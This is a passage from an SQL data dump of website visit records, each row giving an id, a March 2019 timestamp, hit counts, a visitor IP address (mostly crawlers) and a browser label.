7','other'),(404819,1553516694,1,1,0,0,'213.180.203.40','other'),(404820,1553516695,1,1,0,0,'5.255.253.25','other'),(404821,1553516913,1,1,0,0,'37.9.113.103','other'),(404822,1553516940,1,1,0,0,'95.134.202.152','chrome'),(404823,1553517085,1,1,0,0,'37.9.113.148','other'),(404824,1553517087,1,1,0,0,'95.108.213.4','other'),(404825,1553517145,1,1,0,0,'178.154.171.24','other'),(404826,1553517147,1,1,0,0,'95.108.181.96','other'),(404827,1553517154,1,1,0,0,'66.249.66.136','chrome'),(404828,1553517169,1,1,0,0,'54.36.150.13','other'),(404829,1553517240,1,1,0,0,'8.29.198.25','other'),(404830,1553517271,1,1,0,0,'8.29.198.26','other'),(404831,1553517285,1,1,0,0,'141.8.183.23','other'),(404832,1553517315,1,1,0,0,'95.108.181.75','other'),(404833,1553517422,1,1,0,0,'178.154.171.27','other'),(404834,1553517428,1,1,0,0,'5.255.253.38','other'),(404835,1553517535,1,1,0,0,'91.196.178.70','firefox'),(404836,1553517593,1,1,0,0,'87.250.224.65','other'),(404837,1553517595,1,1,0,0,'178.154.200.8','other'),(404838,1553517623,1,1,0,0,'54.36.150.123','other'),(404839,1553517630,1,1,0,0,'54.36.148.112','other'),(404840,1553517719,1,1,0,0,'157.55.39.9','other'),(404841,1553517754,1,1,0,0,'91.196.177.46','firefox'),(404842,1553518185,1,1,0,0,'51.255.65.46','other'),(404843,1553518214,1,1,0,0,'5.45.207.79','other'),(404844,1553518237,1,1,0,0,'91.196.178.166','chrome'),(404845,1553518271,1,1,0,0,'54.36.150.78','other'),(404846,1553518461,2,2,0,0,'66.249.66.58','chrome'),(404847,1553518648,1,1,0,0,'54.36.148.6','other'),(404848,1553519184,1,1,0,0,'46.229.168.137','other'),(404849,1553519284,1,1,0,0,'46.229.168.138','other'),(404850,1553519474,1,1,0,0,'46.229.168.129','other'),(404851,1553519563,2,2,0,0,'66.249.66.136','chrome'),(404852,1553519732,1,1,0,0,'95.132.37.81','firefox'),(404853,1553519739,1,1,0,0,'91.196.178.180','firefox'),(404854,1553519922,1,1,0,0,'54.36.148.218','other'),(404855,1553520241,1,1,0,0,'66.249.66.62','chrome'),(404856,1553520700,1,1,0,0,'54.36.148.96','other'),(404857,1553520855,1,1,0,0,'66.249.66.136','chrome'),(404858,1553520888,1,1,0,0,'54.36.148.48','other'),(404859,1553520918,1,1,0,0,'91.196.178.92','firefox'),(404860,1553521058,1,1,0,0,'66.249.66.138','chrome'),(404861,1553521192,1,1,0,0,'40.77.167.69','other'),(404862,1553521301,1,1,0,0,'212.90.45.139','firefox'),(404863,1553521426,1,1,0,0,'5.196.87.175','other'),(404864,1553522219,1,1,0,0,'157.55.39.9','other'),(404865,1553522269,1,1,0,0,'54.36.149.91','other'),(404866,1553522418,1,1,0,0,'207.46.13.222','other'),(404867,1553522503,1,1,0,0,'91.196.178.93','chrome'),(404868,1553522577,1,1,0,0,'54.36.150.118','other'),(404869,1553522734,1,1,0,0,'66.249.66.138','chrome'),(404870,1553523143,1,1,0,0,'54.36.148.136','other'),(404871,1553523637,1,1,0,0,'54.36.148.131','other'),(404872,1553524012,1,1,0,0,'54.36.150.88','other'),(404873,1553524032,1,1,0,0,'54.36.148.90','other'),(404874,1553524201,2,2,0,0,'157.55.39.197','other'),(404875,1553524234,1,1,0,0,'46.229.168.139','other'),(404876,1553524259,1,1,0,0,'46.229.168.143','other'),(404877,1553524337,1,1,0,0,'91.196.178.93','chrome'),(404878,1553524695,1,1,0,0,'91.196.177.46','firefox'),(404879,1553524937,1,1,0,0,'54.36.148.133','other'),(404880,1553525027,1,1,0,0,'95.132.59.51','firefox'),(404881,1553525373,1,1,0,0,'54.36.150.49','other'),(404882,1553525387,1,1,0,0,'46.229.168.152','other'),(404883,1553525568,1,1,0,0,'54.36.148.233','other'),(404884,1553525790,1,1,0,0,'91.196.177.46','firefox'),(404885,1553526003,1,1,0,0,'46.118.157.179','chrome'),(404886,1553526162,1,1,0,0,'77.120.111.121','chrome'),(404887,1553526270,1,1,0,0,'54.36.148.110','other'),(404888,1553526419,1,1,0,0,'54.36.148.103','other'),(404889,1553526612,2,2,0,0,'207.46.13.222','other'),(404890,1553526692,1,1,0,0,'95.163.255.43','other'),(404891,1553526752,1,1,0,0,'54.36.150.119','other'),(404892,1553527147,1,1,0,0,'157.55.39.197','other'),(404893,1553527716,1,1,0,0,'54.36.148.199','other'),(404894,1553527717,2,2,0,0,'95.213.141.126','opera'),(404895,1553527816,1,1,0,0,'54.36.150.152','other'),(404896,1553527833,1,1,0,0,'37.9.113.20','other'),(404897,1553527852,1,1,0,0,'87.250.224.118','other'),(404898,1553527926,1,1,0,0,'5.196.87.172','other'),(404899,1553528028,1,1,0,0,'5.45.207.79','other'),(404900,1553528042,1,1,0,0,'5.45.207.19','other'),(404901,1553528081,1,1,0,0,'8.29.198.27','other'),(404902,1553528097,1,1,0,0,'46.229.168.143','other'),(404903,1553528115,1,1,0,0,'8.29.198.26','other'),(404904,1553528364,1,1,0,0,'37.9.113.148','other'),(404905,1553528459,1,1,0,0,'5.255.253.25','other'),(404906,1553528656,1,1,0,0,'54.36.149.96','other'),(404907,1553528749,1,1,0,0,'207.46.13.222','other'),(404908,1553528861,1,1,0,0,'66.249.66.136','chrome'),(404909,1553528908,1,1,0,0,'213.108.41.211','chrome'),(404910,1553529120,1,1,0,0,'95.108.213.4','other'),(404911,1553529266,1,1,0,0,'54.36.150.106','other'),(404912,1553529279,1,1,0,0,'157.55.39.182','other'),(404913,1553529487,1,1,0,0,'176.8.91.139','chrome'),(404914,1553529740,1,1,0,0,'54.36.150.42','other'),(404915,1553529770,1,1,0,0,'54.36.148.113','other'),(404916,1553529821,1,1,0,0,'54.36.150.103','other'),(404917,1553529829,1,1,0,0,'66.249.73.7','chrome'),(404918,1553529937,1,1,0,0,'213.108.41.211','chrome'),(404919,1553529982,1,1,0,0,'46.229.168.147','other'),(404920,1553530011,1,1,0,0,'180.76.15.157','other'),(404921,1553530045,1,1,0,0,'66.249.66.136','chrome'),(404922,1553530200,1,1,0,0,'5.199.239.98','chrome'),(404923,1553530299,1,1,0,0,'54.36.148.172','other'),(404924,1553530496,1,1,0,0,'46.229.168.151','other'),(404925,1553530721,1,1,0,0,'54.36.149.76','other'),(404926,1553530908,1,1,0,0,'54.36.150.115','other'),(404927,1553530980,1,1,0,0,'5.188.210.44','chrome'),(404928,1553530996,1,1,0,0,'54.36.149.2','other'),(404929,1553531150,1,1,0,0,'46.229.168.149','other'),(404930,1553531497,1,1,0,0,'66.249.66.136','chrome'),(404931,1553531728,1,1,0,0,'46.229.168.135','other'),(404932,1553531927,2,2,0,0,'157.55.39.197','other'),(404933,1553531991,1,1,0,0,'54.36.148.96','other'),(404934,1553532010,1,1,0,0,'180.76.15.30','other'),(404935,1553532198,1,1,0,0,'54.36.148.155','other'),(404936,1553532374,1,1,0,0,'5.188.210.51','chrome'),(404937,1553532677,1,1,0,0,'54.36.148.222','other'),(404938,1553532719,1,1,0,0,'46.229.168.139','other'),(404939,1553532890,1,1,0,0,'54.36.150.51','other'),(404940,1553532919,2,2,0,0,'207.46.13.222','other'),(404941,1553533572,1,1,0,0,'66.249.66.136','chrome'),(404942,1553533635,1,1,0,0,'66.249.66.58','chrome'),(404943,1553534407,1,1,0,0,'54.36.148.78','other'),(404944,1553534541,1,1,0,0,'46.229.168.139','other'),(404945,1553534570,1,1,0,0,'54.36.150.191','other'),(404946,1553534772,1,1,0,0,'54.36.148.167','other'),(404947,1553534788,1,1,0,0,'46.229.168.144','other'),(404948,1553534813,1,1,0,0,'66.249.66.58','chrome'),(404949,1553535402,1,1,0,0,'46.229.168.142','other'),(404950,1553535415,2,2,0,0,'66.249.66.134','chrome'),(404951,1553535539,1,1,0,0,'66.249.66.136','chrome'),(404952,1553535959,1,1,0,0,'54.36.148.137','other'),(404953,1553536116,1,1,0,0,'46.229.168.143','other'),(404954,1553536278,1,1,0,0,'82.145.210.119','other'),(404955,1553536344,1,1,0,0,'54.36.148.35','other'),(404956,1553536393,1,1,0,0,'46.229.168.150','other'),(404957,1553536557,1,1,0,0,'54.36.148.219','other'),(404958,1553536717,1,1,0,0,'5.45.207.79','other'),(404959,1553536756,1,1,0,0,'54.36.150.148','other'),(404960,1553537193,1,1,0,0,'46.166.190.149','other'),(404961,1553537338,1,1,0,0,'54.36.148.81','other'),(404962,1553537410,1,1,0,0,'52.53.201.78','chrome'),(404963,1553537419,1,1,0,0,'13.66.139.0','other'),(404964,1553537466,1,1,0,0,'176.8.91.139','chrome'),(404965,1553537638,1,1,0,0,'54.36.149.87','other'),(404966,1553538173,1,1,0,0,'54.36.148.39','other'),(404967,1553538941,2,2,0,0,'8.29.198.27','other'),(404968,1553539391,1,1,0,0,'46.229.168.149','other'),(404969,1553539478,1,1,0,0,'54.36.148.231','other'),(404970,1553539479,1,1,0,0,'46.229.168.145','other'),(404971,1553539484,1,1,0,0,'54.36.148.171','other'),(404972,1553539807,1,1,0,0,'5.45.207.19','other'),(404973,1553539841,1,1,0,0,'54.36.150.82','other'),(404974,1553539846,1,1,0,0,'54.36.148.77','other'),(404975,1553540371,1,1,0,0,'54.36.148.125','other'),(404976,1553540526,1,1,0,0,'5.45.207.79','other'),(404977,1553540545,2,2,0,0,'87.250.224.47','other'),(404978,1553540554,1,1,0,0,'207.46.13.8','other'),(404979,1553540627,1,1,0,0,'95.108.213.4','other'),(404980,1553540789,1,1,0,0,'54.36.148.200','other'),(404981,1553540935,1,1,0,0,'5.45.207.19','other'),(404982,1553540989,1,1,0,0,'178.154.244.11','other'),(404983,1553541020,1,1,0,0,'82.145.211.158','other'),(404984,1553541173,1,1,0,0,'54.36.148.91','other'),(404985,1553541422,1,1,0,0,'54.36.149.41','other'),(404986,1553542115,1,1,0,0,'54.36.149.86','other'),(404987,1553542323,1,1,0,0,'46.229.168.149','other'),(404988,1553542427,1,1,0,0,'54.36.148.74','other'),(404989,1553542625,1,1,0,0,'40.77.167.145','other'),(404990,1553542914,1,1,0,0,'54.36.150.92','other'),(404991,1553543298,1,1,0,0,'46.229.168.135','other'),(404992,1553543441,1,1,0,0,'54.36.148.4','other'),(404993,1553543506,1,1,0,0,'188.163.5.20','chrome'),(404994,1553543579,1,1,0,0,'54.36.150.61','other'),(404995,1553544218,1,1,0,0,'54.36.150.170','other'),(404996,1553544355,1,1,0,0,'54.36.148.165','other'),(404997,1553544692,1,1,0,0,'54.36.148.154','other'),(404998,1553545029,1,1,0,0,'46.229.168.149','other'),(404999,1553545035,1,1,0,0,'54.36.150.77','other'),(405000,1553545107,1,1,0,0,'46.229.168.146','other'),(405001,1553545926,1,1,0,0,'54.36.148.70','other'),(405002,1553546426,1,1,0,0,'207.46.13.130','other'),(405003,1553546783,1,1,0,0,'66.249.64.58','chrome'),(405004,1553547184,1,1,0,0,'54.36.148.49','other'),(405005,1553547514,1,1,0,0,'54.36.150.84','other'),(405006,1553547619,1,1,0,0,'66.249.64.31','chrome'),(405007,1553547742,1,1,0,0,'54.36.148.74','other'),(405008,1553547984,1,1,0,0,'157.55.39.80','other'),(405009,1553548002,1,1,0,0,'66.249.64.29','chrome'),(405010,1553548089,1,1,0,0,'37.9.113.148','other'),(405011,1553548095,1,1,0,0,'95.108.213.4','other'),(405012,1553548224,1,1,0,0,'46.229.168.134','other'),(405013,1553548352,1,1,0,0,'54.36.150.119','other'),(405014,1553548364,1,1,0,0,'54.36.148.196','other'),(405015,1553548441,1,1,0,0,'54.36.150.70','other'),(405016,1553549314,1,1,0,0,'54.36.148.99','other'),(405017,1553549465,2,2,0,0,'46.229.168.154','other'),(405018,1553549516,1,1,0,0,'91.209.11.236','other'),(405019,1553549535,1,1,0,0,'54.36.150.102','other'),(405020,1553549796,1,1,0,0,'8.29.198.27','other'),(405021,1553549808,1,1,0,0,'8.29.198.26','other'),(405022,1553549886,1,1,0,0,'54.36.149.35','other'),(405023,1553549971,1,1,0,0,'54.36.148.92','other'),(405024,1553550907,1,1,0,0,'54.36.149.45','other'),(405025,1553551062,3,3,0,0,'178.154.244.11','other'),(405026,1553551176,3,3,0,0,'5.45.207.79','other'),(405027,1553551184,2,2,0,0,'141.8.142.103','other'),(405028,1553551289,1,1,0,0,'37.9.113.148','other'),(405029,1553551324,1,1,0,0,'54.36.148.185','other'),(405030,1553551385,1,1,0,0,'207.46.13.54','other'),(405031,1553551571,1,1,0,0,'95.108.213.4','other'),(405032,1553551727,1,1,0,0,'54.36.150.25','other'),(405033,1553551744,1,1,0,0,'54.36.150.78','other'),(405034,1553551819,1,1,0,0,'54.36.150.161','other'),(405035,1553551864,1,1,0,0,'54.36.150.182','other'),(405036,1553551900,2,2,0,0,'5.45.207.19','other'),(405037,1553551917,1,1,0,0,'54.36.150.96','other'),(405038,1553551921,1,1,0,0,'87.250.224.81','other'),(405039,1553552009,1,1,0,0,'46.229.168.154','other'),(405040,1553552086,1,0,1,0,'66.249.64.31',''),(405041,1553552095,1,1,0,0,'54.36.149.41','other'),(405042,1553552111,1,1,0,0,'66.249.64.29','chrome'),(405043,1553552243,2,2,0,0,'46.229.168.148','other'),(405044,1553552304,1,1,0,0,'54.36.149.87','other'),(405045,1553552311,1,1,0,0,'5.45.207.79','other'),(405046,1553552425,1,1,0,0,'178.154.244.11','other'),(405047,1553552492,1,1,0,0,'54.36.150.133','other'),(405048,1553552844,1,1,0,0,'141.8.142.103','other'),(405049,1553552934,1,1,0,0,'54.36.150.107','other'),(405050,1553553685,1,1,0,0,'209.17.96.202','other'),(405051,1553553846,1,1,0,0,'54.36.149.54','other'),(405052,1553554177,1,1,0,0,'95.163.255.47','other'),(405053,1553554296,1,1,0,0,'207.46.13.211','other'),(405054,1553554422,1,1,0,0,'54.36.150.74','other'),(405055,1553554942,1,1,0,0,'46.229.168.140','other'),(405056,1553554991,1,1,0,0,'54.36.150.91','other'),(405057,1553555070,1,1,0,0,'46.229.168.143','other'),(405058,1553555079,1,1,0,0,'5.45.207.79','other'),(405059,1553555113,1,1,0,0,'46.229.168.145','other'),(405060,1553555151,1,1,0,0,'46.229.168.134','other'),(405061,1553555765,1,1,0,0,'54.36.150.111','other'),(405062,1553555804,1,1,0,0,'54.36.149.48','other'),(405063,1553556242,1,1,0,0,'66.249.64.62','chrome'),(405064,1553556582,1,1,0,0,'54.36.150.56','other'),(405065,1553556797,1,1,0,0,'54.36.148.14','other'),(405066,1553557109,1,1,0,0,'54.36.149.37','other'),(405067,1553557215,1,1,0,0,'54.36.148.181','other'),(405068,1553557229,1,1,0,0,'66.249.64.29','chrome'),(405069,1553557234,1,1,0,0,'54.36.149.16','other'),(405070,1553558498,1,1,0,0,'66.249.64.30','chrome'),(405071,1553558521,1,1,0,0,'176.8.91.139','chrome'),(405072,1553558566,1,1,0,0,'66.249.64.31','chrome'),(405073,1553558649,79,79,0,0,'5.9.138.189','other'),(405074,1553559052,1,1,0,0,'5.196.87.175','other'),(405075,1553559174,1,1,0,0,'46.229.168.146','other'),(405076,1553559200,1,1,0,0,'54.36.149.64','other'),(405077,1553559285,1,1,0,0,'90.188.236.43','chrome'),(405078,1553559369,1,1,0,0,'46.229.168.141','other'),(405079,1553559392,1,1,0,0,'54.36.150.186','other'),(405080,1553559694,1,1,0,0,'54.36.148.91','other'),(405081,1553559871,1,1,0,0,'54.36.150.71','other'),(405082,1553559892,1,1,0,0,'207.46.13.54','other'),(405083,1553560620,1,1,0,0,'40.77.167.96','other'),(405084,1553560646,1,1,0,0,'8.29.198.26','other'),(405085,1553560647,1,1,0,0,'178.137.17.219','chrome'),(405086,1553560654,1,1,0,0,'8.29.198.27','other'),(405087,1553560978,1,1,0,0,'54.36.150.183','other'),(405088,1553561258,1,1,0,0,'66.249.64.29','chrome'),(405089,1553561577,1,1,0,0,'54.36.150.142','other'),(405090,1553561750,1,1,0,0,'54.36.149.13','other'),(405091,1553561985,1,1,0,0,'5.196.87.174','other'),(405092,1553562105,1,1,0,0,'46.229.168.142','other'),(405093,1553562611,1,1,0,0,'54.36.149.12','other'),(405094,1553562786,1,1,0,0,'157.55.39.100','other'),(405095,1553562949,1,1,0,0,'54.36.150.138','other'),(405096,1553563003,1,1,0,0,'54.36.148.18','other'),(405097,1553563295,1,1,0,0,'54.36.148.11','other'),(405098,1553563298,1,1,0,0,'54.36.148.255','other'),(405099,1553563315,1,1,0,0,'54.36.150.85','other'),(405100,1553563328,1,1,0,0,'157.55.39.110','other'),(405101,1553563385,3,3,0,0,'5.45.207.19','other'),(405102,1553563421,1,1,0,0,'141.8.142.103','other'),(405103,1553563487,4,4,0,0,'178.154.244.11','other'),(405104,1553563516,1,1,0,0,'46.229.168.136','other'),(405105,1553563674,1,1,0,0,'54.36.148.96','other'),(405106,1553564053,1,1,0,0,'46.229.168.133','other'),(405107,1553564097,1,1,0,0,'5.45.207.79','other'),(405108,1553564134,1,1,0,0,'46.229.168.139','other'),(405109,1553564215,1,1,0,0,'54.36.149.89','other'),(405110,1553564231,1,1,0,0,'54.36.148.12','other'),(405111,1553564338,1,1,0,0,'87.250.224.47','other'),(405112,1553564534,1,1,0,0,'95.108.213.4','other'),(405113,1553564570,1,1,0,0,'178.154.244.11','other'),(405114,1553564682,1,1,0,0,'66.249.64.29','chrome'),(405115,1553564989,1,1,0,0,'54.36.148.40','other'),(405116,1553565082,1,1,0,0,'54.36.149.96','other'),(405117,1553565180,1,1,0,0,'54.36.150.85','other'),(405118,1553565492,1,1,0,0,'54.36.148.217','other'),(405119,1553565907,1,1,0,0,'54.36.150.56','other'),(405120,1553565948,1,1,0,0,'66.249.64.62','chrome'),(405121,1553566047,2,2,0,0,'66.249.64.29','chrome'),(405122,1553566176,1,1,0,0,'54.36.150.163','other'),(405123,1553567016,1,1,0,0,'54.36.150.129','other'),(405124,1553567152,1,1,0,0,'54.36.148.201','other'),(405125,1553567380,1,1,0,0,'5.196.87.175','other'),(405126,1553567835,1,1,0,0,'66.249.64.58','chrome'),(405127,1553568028,1,1,0,0,'66.249.64.29','chrome'),(405128,1553568403,1,1,0,0,'54.36.148.217','other'),(405129,1553568482,1,1,0,0,'54.36.148.193','other'),(405130,1553568515,1,1,0,0,'46.229.168.144','other'),(405131,1553568601,1,1,0,0,'54.36.148.168','other'),(405132,1553568802,1,1,0,0,'54.36.148.139','other'),(405133,1553568845,1,1,0,0,'54.36.149.57','other'),(405134,1553568996,1,1,0,0,'83.97.23.229','chrome'),(405135,1553569266,1,1,0,0,'54.36.149.38','other'),(405136,1553569332,1,1,0,0,'207.46.13.225','other'),(405137,1553569490,1,1,0,0,'66.249.64.58','chrome'),(405138,1553569575,1,1,0,0,'46.229.168.152','other'),(405139,1553569613,1,1,0,0,'66.249.64.60','chrome'),(405140,1553569634,2,2,0,0,'176.31.246.37','chrome'),(405141,1553569639,2,2,0,0,'66.249.64.30','chrome'),(405142,1553569978,1,1,0,0,'66.249.64.29','chrome'),(405143,1553570140,1,1,0,0,'54.36.150.154','other'),(405144,1553570172,1,1,0,0,'54.36.148.177','other'),(405145,1553570721,1,1,0,0,'46.229.168.133','other'),(405146,1553570724,1,1,0,0,'46.229.168.153','other'),(405147,1553570738,1,1,0,0,'54.36.148.234','other'),(405148,1553570866,1,1,0,0,'207.46.13.225','other'),(405149,1553571060,1,1,0,0,'66.249.64.29','chrome'),(405150,1553571168,2,2,0,0,'66.249.64.30','chrome'),(405151,1553571325,1,1,0,0,'54.36.148.206','other'),(405152,1553571489,1,1,0,0,'8.29.198.25','other'),(405153,1553571496,1,1,0,0,'8.29.198.26','other'),(405154,1553571613,1,1,0,0,'66.249.64.60','chrome'),(405155,1553571679,1,1,0,0,'46.229.168.129','other'),(405156,1553571714,1,1,0,0,'5.45.207.19','other'),(405157,1553571723,1,1,0,0,'54.36.148.119','other'),(405158,1553571787,1,1,0,0,'141.8.142.103','other'),(405159,1553571881,1,1,0,0,'5.45.207.79','other'),(405160,1553571889,1,1,0,0,'157.55.39.100','other'),(405161,1553572027,1,1,0,0,'46.211.20.44','chrome'),(405162,1553572252,1,1,0,0,'54.36.148.70','other'),(405163,1553572450,1,1,0,0,'46.229.168.146','other'),(405164,1553572700,1,1,0,0,'54.36.148.251','other'),(405165,1553573100,1,1,0,0,'54.36.150.58','other'),(405166,1553573145,1,1,0,0,'46.229.168.133','other'),(405167,1553573283,1,1,0,0,'5.188.210.44','chrome'),(405168,1553573340,1,1,0,0,'54.36.148.189','other'),(405169,1553573372,1,1,0,0,'54.36.148.223','other'),(405170,1553573415,1,1,0,0,'95.163.255.43','other'),(405171,1553573442,2,2,0,0,'66.249.64.29','chrome'),(405172,1553573486,1,1,0,0,'54.36.148.170','other'),(405173,1553574305,1,1,0,0,'157.55.39.100','other'),(405174,1553575035,1,1,0,0,'54.36.148.75','other'),(405175,1553575066,1,1,0,0,'66.249.64.62','chrome'),(405176,1553575092,1,1,0,0,'54.36.148.199','other'),(405177,1553575782,1,1,0,0,'54.36.148.129','other'),(405178,1553575853,1,1,0,0,'66.249.64.30','chrome'),(405179,1553575914,1,1,0,0,'157.55.39.100','other'),(405180,1553576031,1,1,0,0,'66.249.64.29','chrome'),(405181,1553576156,1,1,0,0,'54.36.150.173','other'),(405182,1553576284,1,1,0,0,'54.36.148.183','other'),(405183,1553576516,1,1,0,0,'54.36.149.64','other'),(405184,1553576751,1,1,0,0,'207.46.13.225','other'),(405185,1553576783,3,3,0,0,'66.249.64.31','chrome'),(405186,1553576813,4,4,0,0,'66.249.64.62','chrome'),(405187,1553576964,2,2,0,0,'54.186.220.13','chrome'),(405188,1553576986,1,1,0,0,'54.36.150.118','other'),(405189,1553577147,1,1,0,0,'66.249.64.58','chrome'),(405190,1553577362,2,2,0,0,'66.249.64.30','chrome'),(405191,1553577406,1,1,0,0,'46.229.168.146','other'),(405192,1553577684,2,2,0,0,'66.249.64.31','chrome'),(405193,1553577790,1,1,0,0,'13.57.233.99','chrome'),(405194,1553577855,1,1,0,0,'54.36.148.177','other'),(405195,1553578007,1,1,0,0,'54.36.150.163','other'),(405196,1553578060,1,1,0,0,'66.249.64.29','chrome'),(405197,1553578089,1,1,0,0,'54.36.148.137','other'),(405198,1553578264,1,1,0,0,'54.36.150.102','other'),(405199,1553578445,1,1,0,0,'213.180.203.9','other'),(405200,1553578471,1,1,0,0,'54.36.150.63','other'),(405201,1553578666,2,2,0,0,'141.8.142.103','other'),(405202,1553578718,1,1,0,0,'37.9.113.20','other'),(405203,1553578729,1,1,0,0,'5.45.207.79','other'),(405204,1553579104,1,1,0,0,'5.196.87.175','other'),(405205,1553579183,1,1,0,0,'54.36.148.32','other'),(405206,1553579372,1,1,0,0,'46.229.168.139','other'),(405207,1553579378,1,1,0,0,'46.229.168.142','other'),(405208,1553579401,1,1,0,0,'54.36.148.75','other'),(405209,1553579783,1,1,0,0,'66.249.64.29','chrome'),(405210,1553579941,1,1,0,0,'54.36.150.18','other'),(405211,1553580148,1,1,0,0,'54.36.148.212','other'),(405212,1553580465,1,1,0,0,'54.36.150.11','other'),(405213,1553580752,1,1,0,0,'66.249.64.62','chrome'),(405214,1553580888,1,1,0,0,'54.36.148.248','other'),(405215,1553580897,1,1,0,0,'87.250.224.47','other'),(405216,1553580917,2,2,0,0,'66.249.64.30','chrome'),(405217,1553581178,1,1,0,0,'54.36.150.58','other'),(405218,1553581684,1,1,0,0,'54.36.148.158','other'),(405219,1553582067,1,1,0,0,'54.36.149.71','other'),(405220,1553582304,1,1,0,0,'91.196.178.130','firefox'),(405221,1553582320,1,1,0,0,'54.36.148.179','other'),(405222,1553582333,1,1,0,0,'8.29.198.27','other'),(405223,1553582342,1,1,0,0,'8.29.198.26','other'),(405224,1553582948,1,1,0,0,'54.36.148.117','other'),(405225,1553582963,1,1,0,0,'207.46.13.225','other'),(405226,1553583024,2,2,0,0,'66.249.64.29','chrome'),(405227,1553583031,1,1,0,0,'54.36.149.13','other'),(405228,1553583107,1,1,0,0,'54.36.148.209','other'),(405229,1553583113,1,1,0,0,'180.163.220.4','chrome'),(405230,1553583202,1,1,0,0,'54.36.149.43','other'),(405231,1553583236,1,1,0,0,'37.53.147.173','chrome'),(405232,1553583477,1,1,0,0,'54.36.148.191','other'),(405233,1553583486,1,1,0,0,'42.236.10.106','other'),(405234,1553583652,1,1,0,0,'95.132.0.7','chrome'),(405235,1553583857,1,1,0,0,'66.249.64.58','chrome'),(405236,1553583966,1,1,0,0,'66.249.64.31','chrome'),(405237,1553584045,1,1,0,0,'141.8.142.103','other'),(405238,1553584225,1,1,0,0,'54.36.150.18','other'),(405239,1553584305,1,1,0,0,'193.57.42.7','chrome'),(405240,1553584332,2,2,0,0,'207.46.13.225','other'),(405241,1553584412,1,1,0,0,'54.36.150.13','other'),(405242,1553584617,1,1,0,0,'46.229.168.129','other'),(405243,1553585045,1,1,0,0,'54.36.150.57','other'),(405244,1553585128,1,1,0,0,'95.163.255.48','other'),(405245,1553585149,1,1,0,0,'66.249.64.31','chrome'),(405246,1553585315,1,1,0,0,'46.229.168.132','other'),(405247,1553585452,3,3,0,0,'207.46.13.37','other'),(405248,1553585656,1,1,0,0,'46.229.168.138','other'),(405249,1553585754,1,1,0,0,'89.234.190.157','other'),(405250,1553585931,1,1,0,0,'46.229.168.137','other'),(405251,1553586068,1,1,0,0,'54.36.150.64','other'),(405252,1553586294,1,1,0,0,'91.196.178.93','chrome'),(405253,1553586308,1,1,0,0,'54.36.149.6','other'),(405254,1553586335,1,1,0,0,'54.36.149.81','other'),(405255,1553586497,1,1,0,0,'54.36.148.78','other'),(405256,1553586866,1,1,0,0,'207.46.13.37','other'),(405257,1553586901,1,1,0,0,'54.36.148.243','other'),(405258,1553587019,3,3,0,0,'87.250.224.47','other'),(405259,1553587090,2,2,0,0,'37.55.226.54','chrome'),(405260,1553587210,2,2,0,0,'5.45.207.19','other'),(405261,1553587243,1,1,0,0,'91.196.178.93','chrome'),(405262,1553587307,2,2,0,0,'95.108.213.4','other'),(405263,1553587479,1,1,0,0,'141.8.142.103','other'),(405264,1553587509,2,2,0,0,'91.196.178.101','chrome'),(405265,1553587765,1,1,0,0,'130.180.211.26','firefox'),(405266,1553588018,1,1,0,0,'46.229.168.144','other'),(405267,1553588092,1,1,0,0,'54.36.148.65','other'),(405268,1553588119,1,1,0,0,'37.9.113.103','other'),(405269,1553588226,1,1,0,0,'54.36.150.145','other'),(405270,1553588234,1,1,0,0,'54.36.148.96','other'),(405271,1553588257,1,1,0,0,'54.36.148.26','other'),(405272,1553588412,2,2,0,0,'66.249.64.31','chrome'),(405273,1553588664,1,1,0,0,'54.36.149.71','other'),(405274,1553588686,1,1,0,0,'66.249.64.30','chrome'),(405275,1553588727,1,1,0,0,'91.209.11.236','other'),(405276,1553588739,1,1,0,0,'176.122.120.51','chrome'),(405277,1553588751,1,1,0,0,'178.154.244.11','other'),(405278,1553589309,1,1,0,0,'178.93.194.84','chrome'),(405279,1553589904,1,1,0,0,'54.36.148.146','other'),(405280,1553589918,1,1,0,0,'91.196.178.101','chrome'),(405281,1553590091,1,1,0,0,'54.36.148.88','other'),(405282,1553590359,1,1,0,0,'54.36.148.135','other'),(405283,1553590636,1,1,0,0,'176.105.203.154','chrome'),(405284,1553590833,1,1,0,0,'5.45.207.79','other'),(405285,1553590864,1,1,0,0,'54.36.148.90','other'),(405286,1553591056,1,1,0,0,'66.249.64.31','chrome'),(405287,1553591180,1,1,0,0,'54.36.148.136','other'),(405288,1553591247,2,2,0,0,'178.93.194.84','chrome'),(405289,1553591814,1,1,0,0,'66.249.64.29','chrome'),(405290,1553592117,1,1,0,0,'54.36.148.221','other'),(405291,1553592251,1,1,0,0,'91.196.178.94','firefox'),(405292,1553592371,1,1,0,0,'54.36.148.237','other'),(405293,1553592614,1,1,0,0,'91.196.179.138','chrome'),(405294,1553592901,1,1,0,0,'54.36.148.25','other'),(405295,1553592902,1,1,0,0,'54.36.149.4','other'),(405296,1553593186,1,1,0,0,'8.29.198.25','other'),(405297,1553593192,1,1,0,0,'8.29.198.27','other'),(405299,1553593628,1,1,0,0,'54.36.150.44','other'),(405300,1553593676,1,1,0,0,'54.36.149.96','other'),(405301,1553593718,1,1,0,0,'92.112.248.153','chrome'),(405302,1553593957,1,1,0,0,'54.36.150.51','other'),(405303,1553594009,2,2,0,0,'157.55.39.62','other'),(405304,1553594083,1,1,0,0,'54.36.148.255','other'),(405305,1553594154,1,1,0,0,'54.36.150.96','other'),(405306,1553594317,1,1,0,0,'54.36.148.64','other'),(405307,1553594355,1,1,0,0,'54.36.150.47','other'),(405308,1553594477,1,1,0,0,'37.53.228.40','chrome'),(405309,1553594562,1,1,0,0,'54.36.148.138','other'),(405310,1553594716,1,1,0,0,'46.229.168.135','other'),(405311,1553594781,1,1,0,0,'46.229.168.149','other'),(405312,1553594994,1,1,0,0,'66.249.64.29','chrome'),(405313,1553595836,1,1,0,0,'66.249.64.30','chrome'),(405314,1553596643,1,1,0,0,'46.229.168.132','other'),(405315,1553597226,1,1,0,0,'91.196.178.93','chrome'),(405316,1553597285,2,2,0,0,'66.249.64.29','chrome'),(405317,1553598230,1,1,0,0,'46.229.168.140','other'),(405318,1553598240,1,1,0,0,'66.249.64.31','chrome'),(405319,1553599140,1,1,0,0,'66.249.64.30','chrome'),(405320,1553599157,1,1,0,0,'54.36.150.103','other'),(405321,1553599363,1,1,0,0,'46.229.168.161','other'),(405322,1553599396,1,1,0,0,'66.249.64.58','chrome'),(405323,1553599503,1,1,0,0,'54.36.150.191','other'),(405324,1553599504,1,1,0,0,'91.196.178.33','chrome'),(405325,1553599508,1,1,0,0,'54.36.148.220','other'),(405326,1553599651,1,1,0,0,'46.229.168.142','other'),(405327,1553599680,1,1,0,0,'66.249.64.29','chrome'),(405328,1553599685,1,1,0,0,'54.36.148.50